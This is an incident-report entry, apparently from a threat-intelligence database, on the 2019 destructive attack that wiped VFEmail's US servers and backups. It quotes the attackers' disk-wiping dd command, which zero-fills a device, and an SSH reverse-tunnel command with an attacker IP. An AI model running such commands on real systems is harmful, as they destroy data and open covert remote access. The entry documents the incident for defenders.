Cyber Incident Victim: VFEmail
Date:
Feb 2019
Location:
United States of America
Summary
Hackers breached a privacy-focused email provider's US servers, executing a destructive attack that wiped all data on primary and backup systems across multiple data centers. Using SSH access, the attackers formatted disks with zero-fill commands, destroying virtual machines despite differing authentication. No ransom demand was made, distinguishing it from typical ransomware incidents. The catastrophic data loss, including custom code, led the owner to consider permanent shutdown, citing past financial struggles and inability to recover critical systems.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 1 technique |
| Threat Actors | Type | Location |
|---|---|---|
| 0 actors | Available to members | Available to members |
Description
On February 11, 2019, VFEmail, a privacy-focused email service provider, experienced a catastrophic cyberattack targeting its U.S. infrastructure. The attackers compromised all externally facing systems across multiple data centers, which ran on different operating systems and utilized separate remote authentication mechanisms. VFEmail detected the intrusion when its systems became unresponsive and subsequently identified unauthorized activity during forensic analysis. The attackers were actively formatting the backup server using the command `dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559`, accessed via SSH from IP address 94.155.49.9 with specific tunneling parameters (`ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null [email protected] -R 127.0.0.1:30081:127.0.0.1:22 -N`). Within two hours, the attackers successfully formatted all disks on every server, including primary and backup systems, resulting in the total destruction of all virtual machines (VMs). Notably, the VMs did not share common authentication credentials, indicating the attack involved more sophisticated methods than simple credential-based SSH exploitation. No ransom note or extortion demand was left by the attackers, distinguishing this incident from typical ransomware or DDoS extortion campaigns.
The attack resulted in irreversible data loss for VFEmail’s U.S. mail services, affecting both active mailboxes and backup repositories. VFEmail immediately warned users via its website and Twitter not to reconnect email clients to avoid syncing and overwriting locally stored messages. The service’s owner, identified as Havokmon, stated the attack’s scale and destruction made recovery impractical, citing the loss of custom code and the service’s historical lack of profitability as barriers to rebuilding. Prior incidents included DDoS attacks in 2015 and 2018 that disrupted operations, as well as blocked web server intrusion attempts in November 2018. Havokmon acknowledged possible motives—including use by hackers, political dissidents, or other high-risk groups—but confirmed no specific threats preceded the February 2019 attack. The incident marked one of the first documented cases of a purely destructive attack against an email provider with no financial or ideological demands disclosed, leading to the likely permanent termination of VFEmail’s operations.